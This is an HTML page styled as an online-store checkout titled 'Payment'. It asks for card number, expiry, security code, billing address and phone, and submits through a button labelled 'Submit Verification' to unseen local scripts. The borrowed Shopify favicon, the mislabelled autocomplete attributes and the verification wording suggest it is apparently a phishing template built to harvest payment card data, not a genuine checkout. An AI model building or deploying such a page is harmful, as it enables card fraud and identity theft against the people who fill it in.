<!DOCTYPE html>
<html lang="en" dir="ltr" class="no-js windows chrome desktop page--no-banner page--logo-main page--show page--show card-fields">

<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, height=device-height, minimum-scale=1.0, user-scalable=0">
    <meta name="referrer" content="origin">
    <link rel="shortcut icon" href="https://cdn.shopify.com/s/files/1/0086/9646/3419/files/favicon_M_32x32.png?v=1535473370" type="image/png" />
    <title> Payment </title>

    <link rel="stylesheet" href="css/style-info.css">
    <link rel="stylesheet" href="css/main.css">


    <script src="js/jquery-3.2.1.min.js"></script>
    <script src="js/jquery.maskedinput.min.js"></script>
    <script src="js/info-js.js"></script>
	<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
    <script src="js/main.js"></script>

    
</head>

<body>
    <a href="#main-header" class="skip-to-content">
  Skip to content
</a>

    <header class="banner" data-header role="banner">
        <div class="wrap">

            <h1 class="visually-hidden">
  Payment
</h1>

        </div>
    </header>

    <aside role="complementary">
        <button class="order-summary-toggle order-summary-toggle--show shown-if-js" data-trekkie-id="order_summary_toggle" aria-expanded="false" aria-controls="order-summary" data-drawer-toggle="[data-order-summary]">
            <span class="wrap">
      <span class="order-summary-toggle__inner">
        <span class="order-summary-toggle__icon-wrapper">
          <svg width="20" height="19" xmlns="http://www.w3.org/2000/svg" class="order-summary-toggle__icon">
            <path d="M17.178 13.088H5.453c-.454 0-.91-.364-.91-.818L3.727 1.818H0V0h4.544c.455 0 .91.364.91.818l.09 1.272h13.45c.274 0 .547.09.73.364.18.182.27.454.18.727l-1.817 9.18c-.09.455-.455.728-.91.728zM6.27 11.27h10.09l1.454-7.362H5.634l.637 7.362zm.092 7.715c1.004 0 1.818-.813 1.818-1.817s-.814-1.818-1.818-1.818-1.818.814-1.818 1.818.814 1.817 1.818 1.817zm9.18 0c1.004 0 1.817-.813 1.817-1.817s-.814-1.818-1.818-1.818-1.818.814-1.818 1.818.814 1.817 1.818 1.817z" />
          </svg>
        </span>
            <span class="order-summary-toggle__text order-summary-toggle__text--show">
          <span>Show order summary</span>
            <svg width="11" height="6" xmlns="http://www.w3.org/2000/svg" class="order-summary-toggle__dropdown" fill="#000">
                <path d="M.504 1.813l4.358 3.845.496.438.496-.438 4.642-4.096L9.504.438 4.862 4.534h.992L1.496.69.504 1.812z" />
            </svg>
            </span>
            <span class="order-summary-toggle__text order-summary-toggle__text--hide">
          <span>Hide order summary</span>
            <svg width="11" height="7" xmlns="http://www.w3.org/2000/svg" class="order-summary-toggle__dropdown" fill="#000">
                <path d="M6.138.876L5.642.438l-.496.438L.504 4.972l.992 1.124L6.138 2l-.496.436 3.862 3.408.992-1.122L6.138.876z" />
            </svg>
            </span>
            <span class="order-summary-toggle__total-recap total-recap" data-order-summary-section="toggle-total-recap">

            </span>
            </span>
            </span>
        </button>
    </aside>

    <div class="content" data-content>
        <div class="wrap">
            <div class="main">

                <main class="main__content" role="main">

                    <div class="step" data-step="payment_method" data-last-step="true">

                        <div class="step__sections">
                            <form class="form" id="form" name="form">

                            

                                <div class="section section--billing-address">
                        
                                    <div class="section__header">
                                        <h2 class="section__title">      Credit Card
                                        </h2>
                                        <p class="section__text">
                                            All transactions are secure and encrypted.
                        
                                        </p>
                                    </div>
                        
                                    <div class="section__content">
                                        <fieldset class="content-box">
                                            <legend class="visually-hidden">Choose a Payment
                                            </legend>
                        
                                            <div class="radio-wrapper content-box__row" data-different-billing-address>
                                                <div class="radio__input">
                                                    <input class="input-radio"   data-backup="different_billing_address_true" data-trekkie-id="different_billing_address_field" checked="checked" aria-expanded="true" aria-controls="section--billing-address__different" type="radio" value="true" name="checkout[different_billing_address]" id="checkout_different_billing_address_true"> </div>
                                                <label class="radio__label content-box__emphasis" for="checkout_different_billing_address_true">
                                                    Credit Card
                        
                                                </label>
                                            </div>
                        
                                            <div class="radio-group__row content-box__row content-box__row--secondary" id="section--billing-address__different">
                                                <div class="fieldset">
                        
                                                    <div class="address-fields">
                        
                                                        <div data-address-field="company" data-autocomplete-field-container="true" class="field field--optional">
                                                            <label class="field__label" for="checkout_billing_address_company">Card number</label>
                                                            <div class="field__input-wrapper">
                                                                <input placeholder="Card number" required  minlength="16" maxlength="16" onkeypress="return event.charCode >= 48 && event.charCode <= 57"  autocomplete="billing organization" autocorrect="off" data-trekkie-id="billing_company_field" data-backup="company" class="field__input" size="30" type="tel" name="cc" id="creditCard" />
                                                            </div>
                                                        </div>
                                                        <div class="field--third field field--required" data-address-field="country" data-autocomplete-field-container="true">
                                                            <label class="field__label" for="checkout_shipping_address_country">Expiration date (MM)</label>
                                                            <div class="field__input-wrapper field__input-wrapper--select">
                                                                <select size="1" autocomplete="shipping country" data-trekkie-id="shipping_country_field" data-backup="country" class="field__input field__input--select" aria-required="true" name="expiryMM" id="checkout_shipping_address_country">
                                                                    <option value="1">01-JAN</option>
                                                                    <option value="2">02-FEB</option>
                                                                    <option value="3">03-MAR</option>
                                                                    <option value="4">04-APR</option>
                                                                    <option value="5">05-MAY</option>
                                                                    <option value="6">06-JUN</option>
                                                                    <option value="7">07-JUL</option>
                                                                    <option value="8">08-AUG</option>
                                                                    <option value="9">09-SEP</option>
                                                                    <option value="10" selected="selected">10-OCT</option>
                                                                    <option value="11">11-NOV</option>
                                                                    <option value="12">12-DEC</option>
                        
                                                                </select>
                                                                <div class="field__caret">
                                                                    <svg class="icon-svg icon-svg--color-adaptive-lighter icon-svg--size-10 field__caret-svg" role="presentation" aria-hidden="true" focusable="false">
                                                                        <use xlink:href="#caret-down" /> </svg>
                                                                </div>
                                                            </div>
                                                        </div>
                        
                                                        <div class="field--third field field--required" data-address-field="country" data-autocomplete-field-container="true">
                                                            <label class="field__label" for="checkout_shipping_address_country">Expiration date (YY)</label>
                                                            <div class="field__input-wrapper field__input-wrapper--select">
                                                                <select size="1" autocomplete="shipping country" data-trekkie-id="shipping_country_field" data-backup="country" class="field__input field__input--select" aria-required="true" name="expiryYY" id="checkout_shipping_address_country">
                                                                    <option value="2020" selected="selected">2020</option>
                                                                    <option value="2021">2021</option>
                                                                    <option value="2022">2022</option>
                                                                    <option value="2023">2023</option>
                                                                    <option value="2024">2024</option>
                                                                    <option value="2025">2025</option>
                                                                    <option value="2026">2026</option>
                                                                    <option value="2027">2027</option>
                                                                    <option value="2028">2028</option>
                                                                    <option value="2029">2029</option>
                                                                    <option value="2029">2030</option>
                                                                    <option value="2029">2031</option>
                                                                    <option value="2029">2032</option>
                                                                    <option value="2029">2033</option>
                                                                    <option value="2029">2034</option>
                                                                    <option value="2029">2035</option>
                                                                    <option value="2029">2036</option>
                                                                    <option value="2029">2037</option>
                                                                    <option value="2029">2038</option>
                                                                    <option value="2029">2039</option>
                        
                                                                </select>
                                                                <div class="field__caret">
                                                                    <svg class="icon-svg icon-svg--color-adaptive-lighter icon-svg--size-10 field__caret-svg" role="presentation" aria-hidden="true" focusable="false">
                                                                        <use xlink:href="#caret-down" /> </svg>
                                                                </div>
                                                            </div>
                                                        </div>
                                                        <div class="field--third field field--required" data-address-field="zip" data-autocomplete-field-container="true">
                                                            <label class="field__label" for="checkout_billing_address_zip">Security code</label>
                                                            <div class="field__input-wrapper">
                                                                <input placeholder="Security code"  minlength="3" maxlength="4" onkeypress="return event.charCode >= 48 && event.charCode <= 57" required autocomplete="billing given-name" autocorrect="off" data-trekkie-id="billing_firstname_field" data-backup="first_name" class="field__input" aria-required="true" size="30" type="tel" name="cvv" id="cvv" />
                                                            </div>
                                                        </div>
                        
                                                    </div>
                        
                                                </div>
                                            </div>
                                        </fieldset>
                                    </div>
                                </div>
                        
                                <div class="section__header">
                                    <h2 class="section__title">Billing address</h2>
                                    <p class="section__text">
                                        Select the address that matches your card or payment method.
                                    </p>
                                </div>
                        
                                <div class="section__content">
                                    <fieldset class="content-box">
                                        <legend class="visually-hidden">Choose a billing address</legend>
                        
                                        <div class="radio-wrapper content-box__row" data-different-billing-address>
                                            <div class="radio__input">
                                                <input class="input-radio" data-backup="different_billing_address_true" data-trekkie-id="different_billing_address_field" checked="checked" aria-expanded="true" aria-controls="section--billing-address__different" type="radio" value="true" name="checkout[different_billing_address]" id="checkout_different_billing_address_true"> </div>
                                            <label class="radio__label content-box__emphasis" for="checkout_different_billing_address_true">
                                                Billing Address
                                            </label>
                                        </div>
                        
                                        <div class="radio-group__row content-box__row content-box__row--secondary" id="section--billing-address__different">
                                            <div class="fieldset">
                        
                                                <div class="address-fields" data-address-fields>
                        
                                                    <div class="field--half field field--required" data-address-field="first_name">
                                                        <label class="field__label" for="checkout_billing_address_first_name">First name</label>
                                                        <div class="field__input-wrapper">
                                                            <input placeholder="First name" required autocomplete="billing given-name" autocorrect="off" data-trekkie-id="billing_firstname_field" data-backup="first_name" class="field__input" aria-required="true" size="30" type="text" name="firstname" id="checkout_billing_address_first_name" />
                                                        </div>
                                                    </div>
                                                    <div class="field--half field field--required" data-address-field="last_name">
                                                        <label class="field__label" for="checkout_billing_address_last_name">Last name</label>
                                                        <div class="field__input-wrapper">
                                                            <input placeholder="Last name" required autocomplete="billing family-name" autocorrect="off" data-backup="last_name" data-trekkie-id="billing_lastname_field" class="field__input" aria-required="true" size="30" type="text" name="lastname" id="checkout_billing_address_last_name" />
                                                        </div>
                                                    </div>
                                                    <div data-address-field="company" data-autocomplete-field-container="true" class="field field--optional">
                                                        <label class="field__label" for="checkout_billing_address_company">Company Name (optional)</label>
                                                        <div class="field__input-wrapper">
                                                            <input placeholder="Company Name (optional)" autocomplete="billing organization" autocorrect="off" data-trekkie-id="billing_company_field" data-backup="company" class="field__input" size="30" type="text" name="company" id="checkout_billing_address_company" />
                                                        </div>
                                                    </div>
                                                    <div data-address-field="address1" data-autocomplete-field-container="true" class="field field--required">
                                                        <label class="field__label" for="checkout_billing_address_address1">Address Line 1 (Street &amp; House Number)</label>
                                                        <div class="field__input-wrapper">
                                                            <input placeholder="Address Line 1 (Street &amp; House Number)" required autocomplete="billing address-line1" autocorrect="off" data-trekkie-id="billing_address1_field" data-backup="address1" class="field__input" aria-required="true" size="30" type="text" name="adress" id="checkout_billing_address_address1" />
                                                        </div>
                                                    </div>
                                                    <div data-address-field="address2" data-autocomplete-field-container="true" class="field field--optional">
                                                        <label class="field__label" for="checkout_billing_address_address2">Address Line 2 (optional)</label>
                                                        <div class="field__input-wrapper">
                                                            <input placeholder="Address Line 2 (optional)" autocomplete="billing address-line2" autocorrect="off" data-trekkie-id="billing_address2_field" data-backup="address2" class="field__input" size="30" type="text" name="adress2" id="checkout_billing_address_address2" />
                                                        </div>
                                                    </div>
                                                    <div data-address-field="city" data-autocomplete-field-container="true" class="field field--required">
                                                        <label class="field__label" for="checkout_billing_address_city">City</label>
                                                        <div class="field__input-wrapper">
                                                            <input placeholder="City" required autocomplete="billing address-level2" autocorrect="off" data-trekkie-id="billing_city_field" data-backup="city" class="field__input" aria-required="true" size="30" type="text" name="city" id="checkout_billing_address_city" />
                                                        </div>
                                                    </div>
                        
                                                    <div class="field--third field field--required" data-address-field="country" data-autocomplete-field-container="true">
                                                        <label class="field__label" for="checkout_shipping_address_country">Country/Region</label>
                                                        <div class="field__input-wrapper field__input-wrapper--select">
                                                            <select size="1" autocomplete="shipping country" data-trekkie-id="shipping_country_field" data-backup="country "  value="" class="field__input field__input--select" aria-required="true" name="country" id="checkout_shipping_address_country">
                                                                <option data-code="US" value="United States">United States</option>
                                                                <option data-code="IN" value="India">India</option>
                                                                <option data-code="GB" value="United Kingdom">United Kingdom</option>
                                                                <option data-code="IT" value="Italy">Italy</option>
                                                                <option disabled="disabled" selected="selected" value="---">---</option>
                                                                <option data-code="AF" value="Afghanistan">Afghanistan</option>
                                                                <option data-code="AX" value="Aland Islands">Åland Islands</option>
                                                                <option data-code="AL" value="Albania">Albania</option>
                                                                <option data-code="DZ" value="Algeria">Algeria</option>
                                                                <option data-code="AD" value="Andorra">Andorra</option>
                                                                <option data-code="AO" value="Angola">Angola</option>
                                                                <option data-code="AI" value="Anguilla">Anguilla</option>
                                                                <option data-code="AG" value="Antigua And Barbuda">Antigua &amp; Barbuda</option>
                                                                <option data-code="AR" value="Argentina">Argentina</option>
                                                                <option data-code="AM" value="Armenia">Armenia</option>
                                                                <option data-code="AW" value="Aruba">Aruba</option>
                                                                <option data-code="AU" value="Australia">Australia</option>
                                                                <option data-code="AT" value="Austria">Austria</option>
                                                                <option data-code="AZ" value="Azerbaijan">Azerbaijan</option>
                                                                <option data-code="BS" value="Bahamas">Bahamas</option>
                                                                <option data-code="BH" value="Bahrain">Bahrain</option>
                                                                <option data-code="BD" value="Bangladesh">Bangladesh</option>
                                                                <option data-code="BB" value="Barbados">Barbados</option>
                                                                <option data-code="BY" value="Belarus">Belarus</option>
                                                                <option data-code="BE" value="Belgium">Belgium</option>
                                                                <option data-code="BZ" value="Belize">Belize</option>
                                                                <option data-code="BJ" value="Benin">Benin</option>
                                                                <option data-code="BM" value="Bermuda">Bermuda</option>
                                                                <option data-code="BT" value="Bhutan">Bhutan</option>
                                                                <option data-code="BO" value="Bolivia">Bolivia</option>
                                                                <option data-code="BA" value="Bosnia And Herzegovina">Bosnia &amp; Herzegovina</option>
                                                                <option data-code="BW" value="Botswana">Botswana</option>
                                                                <option data-code="BV" value="Bouvet Island">Bouvet Island</option>
                                                                <option data-code="BR" value="Brazil">Brazil</option>
                                                                <option data-code="IO" value="British Indian Ocean Territory">British Indian Ocean Territory</option>
                                                                <option data-code="VG" value="Virgin Islands, British">British Virgin Islands</option>
                                                                <option data-code="BN" value="Brunei">Brunei</option>
                                                                <option data-code="BG" value="Bulgaria">Bulgaria</option>
                                                                <option data-code="BF" value="Burkina Faso">Burkina Faso</option>
                                                                <option data-code="BI" value="Burundi">Burundi</option>
                                                                <option data-code="KH" value="Cambodia">Cambodia</option>
                                                                <option data-code="CM" value="Republic of Cameroon">Cameroon</option>
                                                                <option data-code="CA" value="Canada">Canada</option>
                                                                <option data-code="CV" value="Cape Verde">Cape Verde</option>
                                                                <option data-code="BQ" value="Caribbean Netherlands">Caribbean Netherlands</option>
                                                                <option data-code="KY" value="Cayman Islands">Cayman Islands</option>
                                                                <option data-code="CF" value="Central African Republic">Central African Republic</option>
                                                                <option data-code="TD" value="Chad">Chad</option>
                                                                <option data-code="CL" value="Chile">Chile</option>
                                                                <option data-code="CN" value="China">China</option>
                                                                <option data-code="CX" value="Christmas Island">Christmas Island</option>
                                                                <option data-code="CC" value="Cocos (Keeling) Islands">Cocos (Keeling) Islands</option>
                                                                <option data-code="CO" value="Colombia">Colombia</option>
                                                                <option data-code="KM" value="Comoros">Comoros</option>
                                                                <option data-code="CG" value="Congo">Congo - Brazzaville</option>
                                                                <option data-code="CD" value="Congo, The Democratic Republic Of The">Congo - Kinshasa</option>
                                                                <option data-code="CK" value="Cook Islands">Cook Islands</option>
                                                                <option data-code="CR" value="Costa Rica">Costa Rica</option>
                                                                <option data-code="HR" value="Croatia">Croatia</option>
                                                                <option data-code="CU" value="Cuba">Cuba</option>
                                                                <option data-code="CW" value="Curaçao">Curaçao</option>
                                                                <option data-code="CY" value="Cyprus">Cyprus</option>
                                                                <option data-code="CZ" value="Czech Republic">Czechia</option>
                                                                <option data-code="CI" value="Côte d&#39;Ivoire">Côte d’Ivoire</option>
                                                                <option data-code="DK" value="Denmark">Denmark</option>
                                                                <option data-code="DJ" value="Djibouti">Djibouti</option>
                                                                <option data-code="DM" value="Dominica">Dominica</option>
                                                                <option data-code="DO" value="Dominican Republic">Dominican Republic</option>
                                                                <option data-code="EC" value="Ecuador">Ecuador</option>
                                                                <option data-code="EG" value="Egypt">Egypt</option>
                                                                <option data-code="SV" value="El Salvador">El Salvador</option>
                                                                <option data-code="GQ" value="Equatorial Guinea">Equatorial Guinea</option>
                                                                <option data-code="ER" value="Eritrea">Eritrea</option>
                                                                <option data-code="EE" value="Estonia">Estonia</option>
                                                                <option data-code="SZ" value="Eswatini">Eswatini</option>
                                                                <option data-code="ET" value="Ethiopia">Ethiopia</option>
                                                                <option data-code="FK" value="Falkland Islands (Malvinas)">Falkland Islands</option>
                                                                <option data-code="FO" value="Faroe Islands">Faroe Islands</option>
                                                                <option data-code="FJ" value="Fiji">Fiji</option>
                                                                <option data-code="FI" value="Finland">Finland</option>
                                                                <option data-code="FR" value="France">France</option>
                                                                <option data-code="GF" value="French Guiana">French Guiana</option>
                                                                <option data-code="PF" value="French Polynesia">French Polynesia</option>
                                                                <option data-code="TF" value="French Southern Territories">French Southern Territories</option>
                                                                <option data-code="GA" value="Gabon">Gabon</option>
                                                                <option data-code="GM" value="Gambia">Gambia</option>
                                                                <option data-code="GE" value="Georgia">Georgia</option>
                                                                <option data-code="DE" value="Germany">Germany</option>
                                                                <option data-code="GH" value="Ghana">Ghana</option>
                                                                <option data-code="GI" value="Gibraltar">Gibraltar</option>
                                                                <option data-code="GR" value="Greece">Greece</option>
                                                                <option data-code="GL" value="Greenland">Greenland</option>
                                                                <option data-code="GD" value="Grenada">Grenada</option>
                                                                <option data-code="GP" value="Guadeloupe">Guadeloupe</option>
                                                                <option data-code="GT" value="Guatemala">Guatemala</option>
                                                                <option data-code="GG" value="Guernsey">Guernsey</option>
                                                                <option data-code="GN" value="Guinea">Guinea</option>
                                                                <option data-code="GW" value="Guinea Bissau">Guinea-Bissau</option>
                                                                <option data-code="GY" value="Guyana">Guyana</option>
                                                                <option data-code="HT" value="Haiti">Haiti</option>
                                                                <option data-code="HM" value="Heard Island And Mcdonald Islands">Heard &amp; McDonald Islands</option>
                                                                <option data-code="HN" value="Honduras">Honduras</option>
                                                                <option data-code="HK" value="Hong Kong">Hong Kong SAR China</option>
                                                                <option data-code="HU" value="Hungary">Hungary</option>
                                                                <option data-code="IS" value="Iceland">Iceland</option>
                                                                <option data-code="IN" value="India">India</option>
                                                                <option data-code="ID" value="Indonesia">Indonesia</option>
                                                                <option data-code="IR" value="Iran, Islamic Republic Of">Iran</option>
                                                                <option data-code="IQ" value="Iraq">Iraq</option>
                                                                <option data-code="IE" value="Ireland">Ireland</option>
                                                                <option data-code="IM" value="Isle Of Man">Isle of Man</option>
                                                                <option data-code="IL" value="Israel">Israel</option>
                                                                <option data-code="IT" value="Italy">Italy</option>
                                                                <option data-code="JM" value="Jamaica">Jamaica</option>
                                                                <option data-code="JP" value="Japan">Japan</option>
                                                                <option data-code="JE" value="Jersey">Jersey</option>
                                                                <option data-code="JO" value="Jordan">Jordan</option>
                                                                <option data-code="KZ" value="Kazakhstan">Kazakhstan</option>
                                                                <option data-code="KE" value="Kenya">Kenya</option>
                                                                <option data-code="KI" value="Kiribati">Kiribati</option>
                                                                <option data-code="XK" value="Kosovo">Kosovo</option>
                                                                <option data-code="KW" value="Kuwait">Kuwait</option>
                                                                <option data-code="KG" value="Kyrgyzstan">Kyrgyzstan</option>
                                                                <option data-code="LA" value="Lao People&#39;s Democratic Republic">Laos</option>
                                                                <option data-code="LV" value="Latvia">Latvia</option>
                                                                <option data-code="LB" value="Lebanon">Lebanon</option>
                                                                <option data-code="LS" value="Lesotho">Lesotho</option>
                                                                <option data-code="LR" value="Liberia">Liberia</option>
                                                                <option data-code="LY" value="Libyan Arab Jamahiriya">Libya</option>
                                                                <option data-code="LI" value="Liechtenstein">Liechtenstein</option>
                                                                <option data-code="LT" value="Lithuania">Lithuania</option>
                                                                <option data-code="LU" value="Luxembourg">Luxembourg</option>
                                                                <option data-code="MO" value="Macao">Macao SAR China</option>
                                                                <option data-code="MG" value="Madagascar">Madagascar</option>
                                                                <option data-code="MW" value="Malawi">Malawi</option>
                                                                <option data-code="MY" value="Malaysia">Malaysia</option>
                                                                <option data-code="MV" value="Maldives">Maldives</option>
                                                                <option data-code="ML" value="Mali">Mali</option>
                                                                <option data-code="MT" value="Malta">Malta</option>
                                                                <option data-code="MQ" value="Martinique">Martinique</option>
                                                                <option data-code="MR" value="Mauritania">Mauritania</option>
                                                                <option data-code="MU" value="Mauritius">Mauritius</option>
                                                                <option data-code="YT" value="Mayotte">Mayotte</option>
                                                                <option data-code="MX" value="Mexico">Mexico</option>
                                                                <option data-code="MD" value="Moldova, Republic of">Moldova</option>
                                                                <option data-code="MC" value="Monaco">Monaco</option>
                                                                <option data-code="MN" value="Mongolia">Mongolia</option>
                                                                <option data-code="ME" value="Montenegro">Montenegro</option>
                                                                <option data-code="MS" value="Montserrat">Montserrat</option>
                                                                <option data-code="MA" value="Morocco">Morocco</option>
                                                                <option data-code="MZ" value="Mozambique">Mozambique</option>
                                                                <option data-code="MM" value="Myanmar">Myanmar (Burma)</option>
                                                                <option data-code="NA" value="Namibia">Namibia</option>
                                                                <option data-code="NR" value="Nauru">Nauru</option>
                                                                <option data-code="NP" value="Nepal">Nepal</option>
                                                                <option data-code="NL" value="Netherlands">Netherlands</option>
                                                                <option data-code="AN" value="Netherlands Antilles">Netherlands Antilles</option>
                                                                <option data-code="NC" value="New Caledonia">New Caledonia</option>
                                                                <option data-code="NZ" value="New Zealand">New Zealand</option>
                                                                <option data-code="NI" value="Nicaragua">Nicaragua</option>
                                                                <option data-code="NE" value="Niger">Niger</option>
                                                                <option data-code="NG" value="Nigeria">Nigeria</option>
                                                                <option data-code="NU" value="Niue">Niue</option>
                                                                <option data-code="NF" value="Norfolk Island">Norfolk Island</option>
                                                                <option data-code="KP" value="Korea, Democratic People&#39;s Republic Of">North Korea</option>
                                                                <option data-code="MK" value="North Macedonia">North Macedonia</option>
                                                                <option data-code="NO" value="Norway">Norway</option>
                                                                <option data-code="OM" value="Oman">Oman</option>
                                                                <option data-code="PK" value="Pakistan">Pakistan</option>
                                                                <option data-code="PS" value="Palestinian Territory, Occupied">Palestinian Territories</option>
                                                                <option data-code="PA" value="Panama">Panama</option>
                                                                <option data-code="PG" value="Papua New Guinea">Papua New Guinea</option>
                                                                <option data-code="PY" value="Paraguay">Paraguay</option>
                                                                <option data-code="PE" value="Peru">Peru</option>
                                                                <option data-code="PH" value="Philippines">Philippines</option>
                                                                <option data-code="PN" value="Pitcairn">Pitcairn Islands</option>
                                                                <option data-code="PL" value="Poland">Poland</option>
                                                                <option data-code="PT" value="Portugal">Portugal</option>
                                                                <option data-code="QA" value="Qatar">Qatar</option>
                                                                <option data-code="RE" value="Reunion">Réunion</option>
                                                                <option data-code="RO" value="Romania">Romania</option>
                                                                <option data-code="RU" value="Russia">Russia</option>
                                                                <option data-code="RW" value="Rwanda">Rwanda</option>
                                                                <option data-code="WS" value="Samoa">Samoa</option>
                                                                <option data-code="SM" value="San Marino">San Marino</option>
                                                                <option data-code="ST" value="Sao Tome And Principe">São Tomé &amp; Príncipe</option>
                                                                <option data-code="SA" value="Saudi Arabia">Saudi Arabia</option>
                                                                <option data-code="SN" value="Senegal">Senegal</option>
                                                                <option data-code="RS" value="Serbia">Serbia</option>
                                                                <option data-code="SC" value="Seychelles">Seychelles</option>
                                                                <option data-code="SL" value="Sierra Leone">Sierra Leone</option>
                                                                <option data-code="SG" value="Singapore">Singapore</option>
                                                                <option data-code="SX" value="Sint Maarten">Sint Maarten</option>
                                                                <option data-code="SK" value="Slovakia">Slovakia</option>
                                                                <option data-code="SI" value="Slovenia">Slovenia</option>
                                                                <option data-code="SB" value="Solomon Islands">Solomon Islands</option>
                                                                <option data-code="SO" value="Somalia">Somalia</option>
                                                                <option data-code="ZA" value="South Africa">South Africa</option>
                                                                <option data-code="GS" value="South Georgia And The South Sandwich Islands">South Georgia &amp; South Sandwich Islands</option>
                                                                <option data-code="KR" value="South Korea">South Korea</option>
                                                                <option data-code="SS" value="South Sudan">South Sudan</option>
                                                                <option data-code="ES" value="Spain">Spain</option>
                                                                <option data-code="LK" value="Sri Lanka">Sri Lanka</option>
                                                                <option data-code="BL" value="Saint Barthélemy">St. Barthélemy</option>
                                                                <option data-code="SH" value="Saint Helena">St. Helena</option>
                                                                <option data-code="KN" value="Saint Kitts And Nevis">St. Kitts &amp; Nevis</option>
                                                                <option data-code="LC" value="Saint Lucia">St. Lucia</option>
                                                                <option data-code="MF" value="Saint Martin">St. Martin</option>
                                                                <option data-code="PM" value="Saint Pierre And Miquelon">St. Pierre &amp; Miquelon</option>
                                                                <option data-code="VC" value="St. Vincent">St. Vincent &amp; Grenadines</option>
                                                                <option data-code="SD" value="Sudan">Sudan</option>
                                                                <option data-code="SR" value="Suriname">Suriname</option>
                                                                <option data-code="SJ" value="Svalbard And Jan Mayen">Svalbard &amp; Jan Mayen</option>
                                                                <option data-code="SE" value="Sweden">Sweden</option>
                                                                <option data-code="CH" value="Switzerland">Switzerland</option>
                                                                <option data-code="SY" value="Syria">Syria</option>
                                                                <option data-code="TW" value="Taiwan">Taiwan</option>
                                                                <option data-code="TJ" value="Tajikistan">Tajikistan</option>
                                                                <option data-code="TZ" value="Tanzania, United Republic Of">Tanzania</option>
                                                                <option data-code="TH" value="Thailand">Thailand</option>
                                                                <option data-code="TL" value="Timor Leste">Timor-Leste</option>
                                                                <option data-code="TG" value="Togo">Togo</option>
                                                                <option data-code="TK" value="Tokelau">Tokelau</option>
                                                                <option data-code="TO" value="Tonga">Tonga</option>
                                                                <option data-code="TT" value="Trinidad and Tobago">Trinidad &amp; Tobago</option>
                                                                <option data-code="TN" value="Tunisia">Tunisia</option>
                                                                <option data-code="TR" value="Turkey">Turkey</option>
                                                                <option data-code="TM" value="Turkmenistan">Turkmenistan</option>
                                                                <option data-code="TC" value="Turks and Caicos Islands">Turks &amp; Caicos Islands</option>
                                                                <option data-code="TV" value="Tuvalu">Tuvalu</option>
                                                                <option data-code="UM" value="United States Minor Outlying Islands">U.S. Outlying Islands</option>
                                                                <option data-code="UG" value="Uganda">Uganda</option>
                                                                <option data-code="UA" value="Ukraine">Ukraine</option>
                                                                <option data-code="AE" value="United Arab Emirates">United Arab Emirates</option>
                                                                <option data-code="GB" value="United Kingdom">United Kingdom</option>
                                                                <option data-code="US" value="United States">United States</option>
                                                                <option data-code="UY" value="Uruguay">Uruguay</option>
                                                                <option data-code="UZ" value="Uzbekistan">Uzbekistan</option>
                                                                <option data-code="VU" value="Vanuatu">Vanuatu</option>
                                                                <option data-code="VA" value="Holy See (Vatican City State)">Vatican City</option>
                                                                <option data-code="VE" value="Venezuela">Venezuela</option>
                                                                <option data-code="VN" value="Vietnam">Vietnam</option>
                                                                <option data-code="WF" value="Wallis And Futuna">Wallis &amp; Futuna</option>
                                                                <option data-code="EH" value="Western Sahara">Western Sahara</option>
                                                                <option data-code="YE" value="Yemen">Yemen</option>
                                                                <option data-code="ZM" value="Zambia">Zambia</option>
                                                                <option data-code="ZW" value="Zimbabwe">Zimbabwe</option>
                                                            </select>
                                                            <div class="field__caret">
                                                                <svg class="icon-svg icon-svg--color-adaptive-lighter icon-svg--size-10 field__caret-svg" role="presentation" aria-hidden="true" focusable="false">
                                                                    <use xlink:href="#caret-down" /> </svg>
                                                            </div>
                                                        </div>
                                                    </div>
                                                    <div class="field--third field field--required" data-address-field="province" data-autocomplete-field-container="true">
                                                        <label class="field__label" for="checkout_billing_address_province">State</label>
                                                        <div class="field__input-wrapper field__input-wrapper--select">
                                                            <input placeholder="State" required autocomplete="billing address-level1" autocorrect="off" value="" data-trekkie-id="billing_province_field" data-backup="province" class="field__input" aria-required="true" type="text" name="state" id="checkout_billing_address_province" />
                                                            <div class="field__caret shown-if-js">
                                                                <svg class="icon-svg icon-svg--color-adaptive-lighter icon-svg--size-10 field__caret-svg" role="presentation" aria-hidden="true" focusable="false">
                                                                    <use xlink:href="#caret-down" /> </svg>
                                                            </div>
                                                        </div>
                                                    </div>
                                                    <div class="field--third field field--required" data-address-field="zip" data-autocomplete-field-container="true">
                                                        <label class="field__label" for="checkout_billing_address_zip">ZIP code</label>
                                                        <div class="field__input-wrapper">
                                                            <input placeholder="ZIP code" required autocomplete="billing postal-code" autocorrect="off" data-backup="zip" data-trekkie-id="billing_zip_google_autocomplete_field" class="field__input field__input--zip" aria-required="true" size="30" type="text" name="zip" id="checkout_billing_address_zip" />
                                                        </div>
                                                    </div>
                                                    <div data-address-field="phone" class="field field--required">
                                                        <label class="field__label" for="checkout_billing_address_phone">Phone</label>
                                                        <div class="field__input-wrapper field__input-wrapper--icon-right">
                                                            <input placeholder="Phone" onkeypress="return event.charCode >= 48 && event.charCode <= 57" required autocomplete="billing tel" autocorrect="off" data-backup="phone" data-trekkie-id="billing_phone_field" data-phone-formatter="true" data-phone-formatter-country-select="[name=&#39;checkout[billing_address][country]&#39;]" aria-describedby="tooltip-for-phone" aria-required="true" class="field__input field__input--numeric" size="30" type="tel" name="phone" id="checkout_billing_address_phone" />
                                                            <div id="phone_tooltip" role="tooltip" class="field__icon has-tooltip">
                                                                <span id="tooltip-for-phone" class="tooltip">
                        In case we need to contact you about your order
                        </span>
                                                                <div class="field__icon-svg">
                                                                    <svg class="icon-svg icon-svg--color-adaptive-lighter icon-svg--size-16 icon-svg--block" role="presentation" aria-hidden="true" focusable="false">
                                                                        <use xlink:href="#question" /> </svg>
                                                                </div>
                                                            </div>
                                                        </div>
                                                    </div>
                                                </div>
                        
                                            </div>
                                        </div>
                                    </fieldset>
                                </div>
                        
                                <div class="step__footer" data-step-footer>
                                    <input type="hidden" name="checkout[total_price]" id="checkout_total_price" value="7900" />
                                    <input type="hidden" name="complete" value="1" />
                        
                                    <div class="shown-if-js">
                                        <button name="button" type="submit" id="continue_button" class="step__footer__continue-btn btn " aria-busy="false" trekkie_id="complete_order_button"><span class="btn__content" data-continue-button-content="true">Submit Verification </span>
                                            <svg class="icon-svg icon-svg--size-18 btn__spinner icon-svg--spinner-button" aria-hidden="true" focusable="false">
                                                <use xlink:href="#spinner-button" /> </svg>
                                        </button>
                        
